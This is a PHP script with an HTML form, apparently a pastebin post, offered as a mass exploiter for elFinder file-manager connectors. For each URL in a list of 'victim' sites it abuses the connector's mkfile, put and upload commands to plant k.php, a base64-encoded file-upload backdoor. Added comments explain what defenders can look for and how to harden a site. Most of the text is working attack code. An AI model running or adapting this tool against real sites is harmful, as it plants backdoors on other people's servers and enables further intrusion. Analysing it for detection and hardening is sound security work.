ToKeiChun

Elfinder Auto Xploiter [ Mass Xploiter ]

Oct 8th, 2019
  <!-- Operator-facing page of the tool. The form posts back to the same script: the
       "target" textarea carries a list of elFinder connector URLs (the PHP below splits
       it on CRLF, one URL per line) and the submit button is named "x" with the value
       "hajar". Nothing here is sent to the listed sites; all outbound requests are made
       by the PHP section that follows. -->
  1. <html>
  2. <style type="text/css">
  3. html {
  4. text-align: center;
  5. }
  6. a {
  7. text-decoration: none;
  8. color: black;
  9. }
  10. </style>
  11. <form method="post">
  12. Target: <br>
  13. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
  14. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
  15. </form>
  16. </html>
  17. <?php
  18. # IndoXploit
  // ngirim($url, $isi): issue a single HTTP POST with cURL and hand back the result.
  //   $url - URL to request.
  //   $isi - value given to CURLOPT_POSTFIELDS (the callers in this script pass arrays).
  //   Returns the value of curl_exec(): the response body, or false if the transfer
  //   failed. No error handling is done and the cURL handle is never closed.
  //
  // Defender notes (all taken from the options set below):
  //   - Every request made through this helper carries the same hard-coded User-Agent
  //     string, which can be matched in web-server or proxy logs.
  //   - Redirects are followed, and TLS peer and host verification are both disabled.
  //   - Cookies are written to and read from a file called "coker_log", given as a
  //     relative path; that file is a host artifact wherever this script has been run.
  19. function ngirim($url, $isi) {
  20. $ch = curl_init ("$url");
  21. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  22. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  23. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  24. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  26. curl_setopt ($ch, CURLOPT_POST, 1);
  27. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  28. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  29. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  30. $data3 = curl_exec ($ch);
  31. return $data3;
  32. }
  // Main flow, read from a defender's point of view.
  //
  // For each line of the submitted list the script treats the value as the URL of an
  // elFinder connector and tries to place a PHP file named k.php on that site using the
  // connector's own file commands (mkfile + put, then upload as a fallback). The script
  // sends no credentials with any of these requests.
  //
  // What to look for on a site that exposes an elFinder connector:
  //   - requests to the connector with cmd=mkfile&name=k.php, a POST carrying cmd=put,
  //     or a POST to ?cmd=upload, especially with the User-Agent set in ngirim();
  //   - a new k.php inside the elFinder files directory (the status messages below
  //     point the operator at ../../elfinder/files/).
  // Hardening that addresses this class of abuse: do not leave the connector reachable
  // without authentication, keep elFinder current, and configure the web server so that
  // files inside the managed upload directory are never executed as PHP.
  33. $target = explode("\r\n", $_POST['target']);
  // Runs only when the form's submit field "x" is present and truthy.
  34. if($_POST['x']) {
  // "korban" is Indonesian for "victim"; each entry is used as a URL without validation.
  35. foreach($target as $korban) {
  // Fixed artifact name: the dropped file is always called k.php.
  36. $nama_doang = "k.php";
  // Base64-encoded PHP source. Decoded, it is a short file-upload stub, i.e. a page that
  // lets anyone who can reach it write further files next to itself on the server.
  37. $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  38. $decode_isi = base64_decode($isi_nama_doang);
  // Base64 of the file name, used below to build the "target" value of the put request.
  39. $encode = base64_encode($nama_doang);
  // Side effect on the machine running this tool: the decoded stub is also written to a
  // local k.php (relative path, handle never closed). For incident response, a copy of
  // this script on a host therefore suggests checking the same directory for k.php and
  // for the coker_log cookie file.
  40. $fp = fopen($nama_doang,"w");
  41. fputs($fp, $decode_isi);
  // The submitted URL is echoed into the page without HTML escaping.
  42. echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  43. echo "# Upload[1] ......<br>";
  // Request 1: GET to the connector asking it to create k.php. The target value l1_Lw
  // looks like an elFinder volume/path hash (prefix plus base64 of the path) - an
  // inference from how line 48 builds its own target. The response ($b) is not used.
  44. $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  45. $b = file_get_contents("$url_mkfile");
  // Request 2 body: cmd=put with the decoded stub as the new file content.
  46. $post1 = array(
  47. "cmd" => "put",
  48. "target" => "l1_$encode",
  49. "content" => "$decode_isi",
  50. );
  // Fallback body for cmd=upload: a constant "current" value and a reference, by name,
  // to the local k.php copy written above.
  51. $post2 = array(
  52. "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  53. "upload[]" => "@$nama_doang",);
  54. $output_mkfile = ngirim("$korban", $post1);
  // Success is judged only by the file name appearing somewhere in the response body;
  // the script never requests the dropped file to confirm it exists.
  55. if(preg_match("/$nama_doang/", $output_mkfile)) {
  // "Coba buka di" = "try opening it at".
  56. echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  57. } else {
  58. echo "# Upload Failed 1 <br># Uploading 2..<br>";
  // Second attempt through the connector's upload command, same response-text check.
  59. $upload_ah = ngirim("$korban?cmd=upload", $post2);
  60. if(preg_match("/$nama_doang/", $upload_ah)) {
  61. echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  62. } else {
  63. echo "# Upload Failed 2<br><br>";
  64. }
  65. }
  66. }
  67. }
  68. ?>